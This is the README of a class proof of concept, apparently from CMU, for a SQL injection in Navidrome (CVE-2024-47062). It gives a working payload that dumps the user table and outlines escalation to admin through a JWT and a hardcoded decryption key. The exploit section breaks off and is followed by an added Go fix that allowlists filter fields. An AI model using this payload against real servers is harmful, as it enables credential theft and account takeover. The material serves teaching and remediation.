Exploit for CVE-2024-47062
Description

CVE-2024-47062

This PoC shows how an SQL Injection vulnerability in Navidrome (CVE-2024-47062) can be exploited to gain admin access. It explains how SQL Injection can reveal sensitive data, how to use a JWT token to obtain admin privileges, and how to decrypt passwords with a hardcoded key stored in Navidrome.

This project was created for our Hacking and Offensive Security class (18-739D) at CMU.

Team: Michael Crotty, Annie Liu, Tilden Jackson, Sai Sathvik

Setup

Create the navidrome-music and navidrome-data directories. Download docker-compose.yaml, then run `sudo docker-compose up -d` to install the container. Navidrome.db is created in the navidrome-data directory when the instance is launched for the first time. The service can be accessed at https://127.0.0.1:4533

Exploitation

SQL Injection

SQL Injection can be triggered when a query is passed as a parameter name in the request. Queries are URL encoded before being passed in the URL. Error in the docker logs after passing `'=1` as the parameter:

```
GET /api/radio?%27=1 HTTP/1.1
Log: SELECT count(distinct radio.id) as count FROM radio WHERE (' LIKE {:p0})
Response: "error":"unrecognized token: "' LIKE ?)""
```

Dumped the user table using the following payload: `1=1) UNION SELECT id,user_name,password,is_admin,'','' FROM user --`

GET…
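The log line above shows the root cause: the query-string parameter name (here `'`, sent as `%27`) is copied into the SQL text, while only the value is bound. The fix is to allowlist the names a client may filter on and bind values as parameters. The following is an added example of that check, not Navidrome's code and not part of this PoC; the column set, the function name and the use of `net/url` for decoding are assumptions.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Filterable columns of the radio table (assumed set for this example, not
// Navidrome's real schema). Anything else is refused rather than interpolated.
var radioFilterColumns = map[string]bool{"name": true, "home_page_url": true, "stream_url": true}

// Parameter names must look like plain SQL identifiers before the allowlist is
// consulted, so a key such as "'" (sent as %27) or "1" can never reach the SQL text.
var identRe = regexp.MustCompile(`^[a-z_][a-z0-9_]*$`)

// buildRadioFilter turns a raw query string such as "name=jazz" into a
// parameterized WHERE clause plus bound arguments. Unknown or malformed
// parameter names are rejected; values only ever travel as bind parameters.
func buildRadioFilter(rawQuery string) (string, []interface{}, error) {
	q, err := url.ParseQuery(rawQuery) // decodes %27 -> ' in keys and values
	if err != nil {
		return "", nil, err
	}
	var clauses []string
	var args []interface{}
	for k, vals := range q {
		if !identRe.MatchString(k) || !radioFilterColumns[k] {
			return "", nil, fmt.Errorf("unknown filter field %q", k)
		}
		clauses = append(clauses, "radio."+k+" LIKE ?")
		args = append(args, "%"+vals[0]+"%")
	}
	if len(clauses) == 0 {
		return "", nil, nil
	}
	return "WHERE (" + strings.Join(clauses, " AND ") + ")", args, nil
}

func main() {
	for _, raw := range []string{"name=jazz", "%27=1"} {
		where, args, err := buildRadioFilter(raw)
		fmt.Printf("%q -> where=%q args=%v err=%v\n", raw, where, args, err)
	}
}
```

With this check the `%27=1` request from the log is answered with a validation error before any SQL is built, instead of a SQLite syntax error that leaks the query shape.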
